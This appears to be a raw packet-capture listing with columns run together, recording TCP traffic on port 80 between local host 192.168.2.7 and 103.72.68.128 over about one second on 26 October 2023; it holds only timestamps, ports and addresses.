                                                                              Oct 26, 2023 09:48:02.926124096 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926134109 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.926342964 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926381111 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926387072 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.926419020 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926460028 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.926472902 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926641941 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926695108 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.926770926 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926808119 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926847935 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.926892042 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926929951 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926966906 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.926975012 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.927005053 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927042007 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927048922 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.927124977 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927165031 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927166939 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.927201986 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927247047 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.927272081 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927325964 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927362919 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927369118 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.927400112 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927443981 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.927484989 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927566051 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927614927 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.927649021 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927731037 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927776098 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.927817106 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927855015 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927894115 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927902937 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.927932024 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927969933 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.927975893 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.928098917 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928137064 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928143978 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.928178072 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928226948 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.928267002 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928303957 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928339958 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928348064 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.928423882 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928462029 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928472042 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.928499937 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928548098 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.928630114 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928668976 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928716898 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.928724051 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928755045 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.928803921 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.928816080 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929001093 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929014921 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929039955 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.929092884 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929136992 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.929418087 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929442883 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929483891 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.929533005 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929593086 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929627895 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929637909 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.929681063 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929729939 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.929734945 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929925919 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929965019 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.929971933 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.930006027 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930047989 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.930099010 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930119991 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930162907 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.930341005 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930392981 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930440903 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930444956 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.930517912 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930555105 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930560112 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.930622101 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930638075 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930668116 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.930697918 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930741072 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.930788994 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930855036 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.930891037 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.930964947 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.931040049 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.931080103 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.933352947 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933382988 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933427095 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.933434963 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933499098 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933537006 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.933547020 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933613062 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933628082 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933653116 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.933707952 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933748007 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933748007 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.933794975 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:02.933836937 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:02.933850050 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.065326929 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.253406048 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.253464937 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.253535032 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.253555059 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.253653049 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.253701925 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.253730059 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.253768921 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.253812075 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.253858089 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.253875971 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.253916979 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.253959894 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.254017115 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254062891 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.254117966 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254225016 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254441023 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254487038 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254487038 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.254628897 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254647970 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254659891 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254672050 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.254683971 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.254698992 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254796982 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.254842043 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.254865885 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255352020 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255393982 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.255423069 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255464077 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.255523920 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255609035 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255650997 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255664110 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.255691051 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255734921 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.255762100 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255820990 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255896091 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.255913019 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.255956888 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256026983 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256042957 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.256066084 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256120920 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.256340981 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256416082 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256498098 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256550074 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.256581068 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256648064 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.256674051 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256799936 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256861925 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256911039 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.256973028 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.256989956 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257033110 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.257041931 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257085085 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257124901 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.257271051 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257313013 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.257327080 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257342100 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257388115 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.257399082 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257502079 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257551908 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257595062 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.257596970 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257688046 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257730961 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.257735968 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257771969 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257793903 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.257822037 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257895947 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257939100 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.257949114 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.257985115 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258025885 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.258069038 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258110046 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.258120060 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258173943 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258213997 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.258241892 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258321047 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258363962 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.258363962 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258384943 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258485079 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258500099 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258512974 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.258543968 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.258553028 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258624077 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258666039 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.258692980 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258763075 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258809090 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.258835077 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258898973 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.258959055 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.259005070 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.259011030 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.259927988 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.259990931 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.259994030 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260040998 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.260049105 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260102034 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260154963 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.260154009 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260210991 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260260105 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.260266066 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260318041 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260381937 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260426044 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.260432005 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260457039 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260499954 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.260581017 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260626078 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.260642052 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260694027 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260716915 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260742903 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.260854006 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260906935 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.260955095 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.261034012 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261081934 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.261141062 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261229992 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261271954 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261322975 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.261337996 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261416912 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261425972 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.261452913 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261497974 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.261552095 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261574984 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261611938 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261624098 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.261658907 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261704922 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.261737108 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261796951 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261841059 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.261887074 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.261940002 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262061119 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262084961 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262110949 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.262135983 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.262145996 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262238026 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262325048 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262373924 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.262403011 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262425900 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262474060 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.262495041 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262530088 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.262531042 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262595892 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262641907 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.262648106 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262700081 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262752056 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.262753963 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262780905 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262831926 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.262849092 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262900114 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262922049 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.262954950 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.262990952 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263025045 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263037920 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.263077974 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263123989 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.263128042 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263181925 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263227940 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.263329983 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263385057 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263514996 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263582945 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.263597012 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263685942 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263730049 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.263765097 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.263804913 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:48:03.263848066 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:48:03.264178038 CEST4976280192.168.2.7103.72.68.128
